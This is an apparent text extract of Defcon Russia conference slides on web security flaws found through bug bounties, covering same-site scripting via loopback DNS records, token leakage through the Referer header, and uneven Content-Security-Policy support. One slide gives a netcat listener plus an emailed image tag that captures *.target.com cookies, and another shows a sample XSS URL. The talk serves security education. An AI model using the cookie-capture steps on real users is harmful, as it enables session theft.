6. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 6
7. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 7
XXXYYYZZZ.target.com => 127.0.0.1
What’s wrong?
8. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 8
9. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 9
External IP – 12.34.56.78
Loopback – 127.0.0.1
10. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 10
Attacker:
1) nc –lv 10024
2) email to victim@corp.xxx with
<img src = http://xxyyzz.target.com:10024 >
Victim:
1) Open email and...
2) Load image with *.target.com cookies!
(that’s is why important to know howto correctly set cookies -
http://habrahabr.ru/post/143276/)
11. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 11
http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.s
html
12. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 12
13. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 13
XXXYYYZZZ.target.com => 10.0.0.22
http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html
14. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 14
https://hackerone.com/reports/1509 - $100
23. Situation #3 - HTTP referer
Defcon Russia (DCG #7812) 23
<a href=“http://external.com”>Go!</a>
In request headers:
...
Referer: http://yoursite.com/
...
But what about external resources on web page
such as images, styles...?
24. Situation #3 - HTTP referer
Defcon Russia (DCG #7812) 24
http://super-website.com/user/passRecovery?t=SECRET
...
<img src=http://comics-are-awesome.com/howto-choose-
password.jpg>
...
Owner of
comics-are-awesome.com
know all _SECRET_ tokens (from referer)!
26. Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 26
27. Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 27
28. Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 28
CSP only for some browsers!
Is it ok?
29. Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 29
1) Forks with diff UA
2) Proxy cache
3) Load balancer...
Bug hunter got $100, but...
30. Situation #5 - Content-Security-Policy
Defcon Russia (DCG #7812) 30
Fail! Why:
• ‘Partial support in Internet Explorer 10-11 refers to the
browser only supporting the 'sandbox' directive by using the
'X-Content-Security-Policy' header.
• Partial support in iOS Safari 5.0-5.1 refers to the browser
recognizing the X-Webkit-CSP header but failing to handle
complex cases correctly, often resulting in broken pages.
• Chrome for iOS fails to render pages without a connect-src
'self' policy.
• Old FF problems (some versions between XX and YY)
35. Situations XXX
Defcon Russia (DCG #7812) 35
• Info disclose via CSS files (full path disclosure while
compilation -
file:///applications/hackerone/releases/201402211759
29/app/assets/stylesheets/application/browser-not-
supported.scss (bug #2221)
• SPF and same records
• Short tokens
• Pixel flood attack
• CSRF for login/logout!? (hi Michal Zalewski!)
• ... - https://hackerone.com/security?show_all=true